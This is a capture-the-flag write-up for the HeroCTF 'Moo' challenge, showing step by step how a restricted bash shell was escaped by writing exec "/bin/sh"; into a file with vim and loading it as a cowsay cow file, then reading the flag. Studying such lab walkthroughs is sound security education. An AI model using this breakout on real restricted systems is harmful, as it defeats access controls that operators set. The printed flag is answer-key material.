agatha/hero24
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
master
hero24/misc/moo
History
agatha 031517a34d add web/jinjatic
2024-10-25 17:23:01 -04:00
..
README.md add web/jinjatic 2024-10-25 17:23:01 -04:00

README.md

misc/Moo

We are given SSH access to a machine. We drop into a restricted shell and must break out of it to read the flag.

ssh -p 11380 dyn05.heroctf.fr
user@dyn05.heroctf.fr's password:
Linux moo 6.1.0-25-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.106-3 (2024-08-26) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Oct 25 20:27:41 2024 from 149.102.226.202
 ______________________________________________________
/ Welcome dear CTF player! You can read the flag with: \
\ /bin/sudo /bin/cat /flag.txt. Or can you?...         /
 ------------------------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

When we try to run the commands, we see we're in a restricted shell:

user@moo:~$ /bin/sudo /bin/cat /flag.txt
bash: /bin/sudo: restricted: cannot specify `/' in command names

Let's take a look at our environment a bit with env:

bash: env: command not found

Next thing to do would be look at what our PATH is set to:

user@moo:~$ echo $PATH
/usr/local/rbin

Attempting to update our PATH with export fails as well:

user@moo:~$ PATH=/bin sudo id
bash: PATH: readonly variable
bash: sudo: command not found

Well, let's see what is actually available to us in the only PATH we have available:

user@moo:~$ ls -la $PATH
total 24
drwxr-xr-x 1 root root 4096 Oct 25 18:18 .
drwxr-xr-x 1 root root 4096 Oct 25 18:18 ..
lrwxrwxrwx 1 root root   17 Oct 25 18:18 cowsay -> /usr/games/cowsay
lrwxrwxrwx 1 root root   18 Oct 25 18:18 dircolors -> /usr/bin/dircolors
lrwxrwxrwx 1 root root    7 Oct 25 18:18 ls -> /bin/ls
-rwxr-xr-x 1 root root  206 Oct 25 17:35 rbash
-rwxr-xr-x 1 root root   54 Oct 25 17:35 vim

This reveals a few things:

  • We are in a restricted bashshell
  • We have cowsay

So we use cowsay as a the GTFObin that it is, however we cannot redirect output. Luckily we have vim.

After putting our breakout (exec "/bin/sh";) into a file, we can then run it with cowsay:

cowsay -f tmp x

This gives us a full unrestricted shell, and we can now cat the flag:

PATH=/bin 
Hero{s0m3_s4cr3d_c0w}